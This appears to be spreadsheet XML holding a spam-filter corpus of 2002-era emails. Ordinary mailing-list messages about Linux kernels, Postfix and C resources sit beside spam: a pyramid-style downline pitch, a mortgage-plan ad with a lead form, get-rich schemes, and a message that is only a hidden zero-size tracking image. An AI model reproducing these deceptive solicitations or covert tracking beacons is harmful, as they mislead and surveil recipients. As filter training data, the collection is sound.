 &gt; kernel by hand.  I'd like to humbly offer a tweak to alsa-driver.spec 
 &gt; that helps it build cleanly under such circumstances.  I recognize that 
 &gt; freshrpms.net packages are designed with standard Red Hat in mind, 
 &gt; including a standard kernel RPM.  However, I hope that Matthias will 
 &gt; consider the tweak small enough to justify its incorporation.
 Well, I don't really find it consistent at all to use an rpm package built
 against something that wasn't installed through rpm :-/
 What I'd recommend in your case : You should keep at least one original Red
 Hat Linux kernel (you do just in case, right? ;-)) and install the matching
 alsa-kernel package as you'll need at least one because of the
 dependencies. Then for your custom built kernel, simply "./configure
 --with-cards=all &amp;&amp; make &amp;&amp; make install DESTDIR=/tmp/alsa-driver" from the
 alsa-driver sources then as root copy all the modules under
 /tmp/alsa-driver/lib/modules/ to your modules dir and run "depmod -a".
 Of course you can even make it much faster by not compiling all un-needed
 drivers, as I guess that's one of the reasons one would rebuild his own
 kernel.
 I find this the easiest and cleanest way to get around the problem. It's
 what I've done and what I'll keep doing on my laptop where I'm running a
 kernel recompiled with ACPI.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.00 0.02 0.00
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: An Information
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=gb2312"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;An&amp;nbsp;&amp;nbsp; I n f o r m a t i o n&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;font face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;font face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;An&amp;nbsp;&amp;nbsp; I n f o r m a t i o
 n&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;in the age of
 information&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;FINDING QUICKER SOLUTIONS AND SOLVING 
   PROBLEMS QUICKER&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;font face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;When you are fully booked and
 overloaded 
   with work there are still the possibility to use the&amp;nbsp;ancient mental 
   working methods, used by successful people,&amp;nbsp;instead of the risk for 
   stress and burn out problems.&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;font face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;These ancient methods for shortening 
   waiting time, adding power to a quicker decision, eliminating stress and
 the 
   risk for burn out, are not so commonly used, despite the methods&amp;nbsp;are 
   known from ancient time.&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;font face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;The power in the mental working
 methods 
   claim for no extra energy consumption so the body will not get tired,
 stressed 
   or burn out.&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;font face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;Please check the web
 site:&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;a href="http://www.scaninvent.com/mental.methods"&gt;&lt;font
 face="Arial" size="2"&gt;www.scaninvent.com/mental.methods&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;font face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;In the compendium I, the
 undersigned,&amp;nbsp;will 
   reveile and explain my own methods - how I learned them and how I am
 training 
   and exercizing them as well as the tactics in converting inner knowledge
 to 
   outer reality the speediest way ever known.&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;font face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;You are most wellcome to study these 
   methods.&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;font face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;Best regards&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;TORE AKESSON&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;SVANEBACKEN AB&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;Hoganasvagen 79&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="left"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="2"&gt;S-260 40 Viken&amp;nbsp;&amp;nbsp;
 -&amp;nbsp;&amp;nbsp; 
   Sweden&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">John Hall spake thusly:
 &gt;It has been brought up that a boss no longer marries his secretary.
 Wot, is she not cute???
 Re: Asteroids anyone ?
 Not another one.
 Hmm... the NASA page gives Impact Probability = 3.9e-06.
 One in 250000.
 What, me worry?
 L8r,
   R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">We guarantee you free signups before you ever pay
 a penny!   We will show you the money before you
 ever take out your wallet.  Sign up for FREE and test
 drive our system.  No Obligation whatsoever.  No Time
 Limit on the test drive. Our system is so powerful that the 
 system enrolled over 400 people into my downline the first week.
 To get signed up for FREE and take a test drive click the link:
 mailto:guaranteed4u@btamail.net.cn?subject=more_M_info_please
 The national attention drawn by this program 
 will drive this program with incredible momentum! 
 Don't wait, if you wait, the next 400 people will be above you.
 Signup now for your FREE test drive and have the next 400
 below you!
 mailto:guaranteed4u@btamail.net.cn?subject=more_M_info_please
 All the best,
 Daniel
 Financially Independent Home Business Owner
 1-800-242-0363, Mailbox 1993
 ______________________________________________________
 To be excluded from future notices:
 mailto:guaranteed4u@btamail.net.cn?subject=exclude  
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 25 Sep 2002, Gordon Mohr wrote:
 &gt; In contrast, take a look at this article by Simon J. Wilkie of
 &gt; Caltech:
 Wow, that Wilkie article is the single best explanation I've seen.
 The open question is whether any analysis before the fact warned the
 politicians, or whether the politicians were forewarned and went ahead.  
 What did they know and when did they know it?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-08-20 at 12:10, John P. Looney wrote:
 &gt;  Hmm. Yeah, mutt sorta calls the sendmail program directly. But I thought
 &gt; it would be very crap if the auth details (username, password) had to be
 &gt; hardcoded into the sendmail.cf (and damned if I can work out how to do
 &gt; that anyway).
 Postfix provides a binary called /usr/sbin/sendmail that does the right
 thing. Which, presumably involves sticking your outgoing going message
 in the right queue. Then you need your postfix SMTP client to
 authenticate with your postfix SMTP server. Are you using SASL? If so,
 I remember seeing documentation on how to configure the postfix SMTP
 client to authenticate.
 Nick
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">SoloCDM wrote:
 &gt; Are there any mailing lists (non-newsgroups) for C++ and C Beginners
 &gt; and Advanced programmers?
 Try the following newsgroups - 
 Beginners:
 news:comp.lang.learn.c-c++
 More advanced: 
 news:comp.lang.c
 news:comp.lang.c++
 news:comp.lang.c.moderated
 Also, you should keep a bookmark pointing at the comp.lang.c FAQ at 
 http://www.eskimo.com/~scs/C-faq/top.html
 For tutorials, the guy who maintains the clc FAQ (Steve Summit)
 has a tutorial - http://www.eskimo.com/~scs/cclass/notes/top.html
 Also you could have a look at the excercises he poses - all
 linked from http://www.eskimo.com/~scs/cclass/cclass.html
 For C++, I would guess that the comp.lang.c++ FAQ is a good place
 to start - they're likely to have links to suggested reading
 material.
 If you're going to do any amount of C programming, you should
 think about getting K&amp;R2 (The C programming language, 2nd
 edition, by Kernighan and Ritchie), for C++ the equivalent book
 is Stroustrup. Although the C++ book is a lot bigger :)
 Hope this helps,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt;  sh -c 'for f in "`folders -recurse -fast`" ; do sortm +"$f" ; done'
 &gt; Thanks Tom and Jacob. The above works, but without the double quotes: i.e.
 &gt;
 &gt; sh -c 'for f in `folders -recurse -fast` ; do sortm +"$f" ; done'
 I may have a different version of "sh" than you do; the double quotes
 around the backticks work for my "sh".
 (In the more-than-you-really-wanted-to-know category, you're probably
 safe without the double quotes.  The only reason I put them in is that
 I have some pathologically-named folders, including folders whose
 names contain spaces.  If all your folders have safe names, you don't
 need special quoting.)
  -Jacob
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">more accurately: someone's dream changes reality for everyone, and
 everyone's memory adjusts to perceive the new realities as a continuum,
 replete with new pasts and new memories.
 ever have dreams that "create" their own history to make their irrealities
 plausible and authentic feeling?
 ever notice how the feelings evoked in some dreams stick with you all day?
 i'm sure it's some neurochemical process initiated during the dream that is
 still cycling thru - like a deja vu, triggered by memory processes, where
 you don't actually remember but you feel like you're remembering.
 ggggggggg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
 Hall
 Sent: Monday, September 09, 2002 2:03 PM
 To: FoRK
 Subject: RE: Recommended Viewing
 Isn't this the story where someone's "Dream" has the ability to change
 reality -- then you find the whole world is their dream?
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; Sent: Monday, September 09, 2002 4:26 AM
 &gt; To: John Evdemon
 &gt; Cc: fork@example.com
 &gt; Subject: RE: Recommended Viewing
 &gt;
 &gt; Agreed, completely.  I totally grokked the notion of unintened
 consequence
 &gt; with the original.
 &gt;
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 John
 &gt; Evdemon
 &gt; Sent: Monday, September 09, 2002 7:03 AM
 &gt; To: Fork@xent.com
 &gt; Subject: Re: Recommended Viewing
 &gt;
 &gt;
 &gt; On 8 Sep 2002 at 22:15, Geege Schuman wrote:
 &gt;
 &gt; &gt; who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen
 &gt; &gt; the original?
 &gt; &gt;
 &gt; By "original" if you are referring to the old PBS version, I liked
 that
 &gt; version much better.  Much more thought provoking.
 &gt;
 &gt;
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Insurance Product - No Competition
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_109047_01C2501B.12AB23E0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  300,000 homeowners can't be wrong!	
  Agent opportunities now available
  The Mortgage Savings Program(tm) -- Great New Product For Your Clients!
 22 Year Old Company - Leader in Industry!	 
 ? No Refinancing Fees	 ? No Payroll Deductions	 
 ? No Credit Report	 ? No Paperwork To Do	 
 ? No Group Requirements	 ? Generate Free Leads	 
 ? Perpetual Commissions	 ? No Competition	 
 Your Current Mortgage 	
 Dollar amount of your mortgage:	 $200,000	 
 Percentage rate of your mortgage:	 8.50%	 
 Your current monthly payment:	 $1,537.83	 
 Total Interest paid:	 $353,614	 
 Paid off in:	 30.0 Years	 
 With the Reduce-My-Mortgage plan 	
 Your bi-weekly payment:	 $768.92	 
 Total Interest paid:	 $250,142	 
 Total Interest savings:	 $103,471	 
 Paid off in:	 22.6 Years	 
 Number of payments saved:	 89	 
 Equivalent interest rate:	 6.40%	 
 Call today for more information!
  800-550-2666 ext. 122
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	 	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
 Timezone:	  Eastern     Central     Mountain     Pacific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------=_NextPart_000_109047_01C2501B.12AB23E0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;New Insurance Product - No Competition&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF" bordercolor=3D"#000000" =
 border=3D"1"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/rym/20020709-102a.gif" width=3D"550" =
 height=3D"45" alt=3D"300,000 homeowners can't be wrong!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/rym/20020709-103a.jpg" =
 width=3D"415" height=3D"247"&gt;&lt;/td&gt;
           &lt;td&gt;
             &lt;img src=3D"http://iiq.us/images/rym/20020709-104.jpg" =
 width=3D"135" height=3D"77"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/rym/20020709-105.gif" =
 width=3D"135" height=3D"89" alt=3D"Agent opportunities now =
 available"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/rym/20020709-106.jpg" =
 width=3D"135" height=3D"81"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/rym/20020709-107.gif" width=3D"550" =
 height=3D"7"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/rym/20020709-2a.gif" width=3D"550" =
 height=3D"64" alt=3D"The Mortgage Savings Program(tm) -- Great New =
 Product For Your Clients!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td colspan=3D"2"&gt;&amp;nbsp;=20
             &lt;table width=3D"90%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;22 Year Old =
 Company - Leader in Industry!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
 							&lt;tr&gt;=20
                 &lt;td width=3D"57%"&gt;&lt;font size=3D"3"&gt;&amp;#149;&amp;nbsp;&lt;b&gt;No =
 Refinancing Fees&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"43%"&gt;&lt;font size=3D"3"&gt;&amp;#149;&amp;nbsp;&lt;b&gt;No =
 Payroll Deductions&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"57%"&gt;&lt;font size=3D"3"&gt;&amp;#149;&amp;nbsp;&lt;b&gt;No =
 Credit Report&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"43%"&gt;&lt;font size=3D"3"&gt;&amp;#149;&amp;nbsp;&lt;b&gt;No =
 Paperwork To Do&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"57%"&gt;&lt;font size=3D"3"&gt;&amp;#149;&amp;nbsp;&lt;b&gt;No =
 Group Requirements&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"43%"&gt;&lt;font =
 size=3D"3"&gt;&amp;#149;&amp;nbsp;&lt;b&gt;Generate Free Leads&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"57%"&gt;&lt;b&gt;&amp;#149;&amp;nbsp;Perpetual =
 Commissions&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"43%"&gt;&lt;b&gt;&amp;#149;&amp;nbsp;No Competition&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td colspan=3D"2"&gt; &amp;nbsp;=20
             &lt;table border=3D"1" cellpadding=3D"5" width=3D"90%" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"333366"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" align=3D"center" colspan=3D"2" =
 bgcolor=3D"FFFF00"&gt;
                   &lt;b&gt;&lt;font size=3D"3" color=3D"#000000"&gt;Your &lt;font =
 color=3D"#FF0000"&gt;Current Mortgage&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Dollar amount of your mortgage:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;$200,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Percentage rate of your =
 mortgage:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;8.50%&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Your current monthly payment:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;$1,537.83&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Total Interest paid:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;$353,614&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Paid off in:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;30.0 Years&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" align=3D"center" colspan=3D"2" =
 bgcolor=3D"FFFF00"&gt;
                   &lt;font size=3D"3" color=3D"#000000"&gt;&lt;b&gt;With the &lt;font =
 color=3D"#FF0000"&gt;Reduce-My-Mortgage&lt;/font&gt; plan&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Your bi-weekly payment:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;$768.92&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Total Interest paid:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;$250,142&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#80ff80" size=3D"2"&gt;Total Interest savings:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#80ff80" =
 size=3D"2"&gt;$103,471&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Paid off in:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;22.6 Years&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Number of payments saved:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;89&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"right"&gt;&lt;font =
 color=3D"#ffffff" size=3D"2"&gt;Equivalent interest rate:&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"40%"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" =
 size=3D"2"&gt;6.40%&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Call today for more =
 information!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/rym/20020709-4a.gif" =
 width=3D"529" height=3D"87" alt=3D"800-550-2666 ext. 122"&gt;=20
             &lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;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width=3D"17%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"6" valign=3D"middle" =
 align=3D"center" width=3D"12%"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"17%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"17%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"17%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"28%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"28%"&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"17%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Timezone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;b&gt;&lt;font size=3D"2"&gt;=20
                           &lt;input type=3D"checkbox" name=3D"checkbox" =
 value=3D"Eastern"&gt; Eastern&amp;nbsp;&amp;nbsp;&amp;nbsp;=20
                           &lt;input type=3D"checkbox" name=3D"checkbox" =
 value=3D"Central"&gt; Central&amp;nbsp;&amp;nbsp;&amp;nbsp;=20
                           &lt;input type=3D"checkbox" name=3D"checkbox" =
 value=3D"Mountain"&gt; Mountain&amp;nbsp;&amp;nbsp;&amp;nbsp;=20
                           &lt;input type=3D"checkbox" name=3D"checkbox" =
 value=3D"Pacific"&gt; Pacific &lt;/font&gt;&lt;/b&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"17%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"28%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"28%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"marketing@reduce-your-mortgage.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"rym Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/rym/20020709-3a.gif" =
 width=3D"475" height=3D"93"&gt;=20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&lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_109047_01C2501B.12AB23E0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Important
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;IMG SRC='http://master2.free4all.com/cgi-bin/sp/t.pl?id=6:56446664&amp;o=1&amp;d=1' BORDER=0 WIDTH=0 HEIGHT=0/&gt;&lt;center&gt;&lt;img src=http://www.vitafactory.com/ad-friday/test.gif border=0&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Incredible Cash Generating System!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Greetings,
 Like most of us I have been burned in several Programs in the past. However, 
 I really, truly, believe that this program, " The Last Program" is going to 
 help me and many others achieve their lifelong financial dreams.
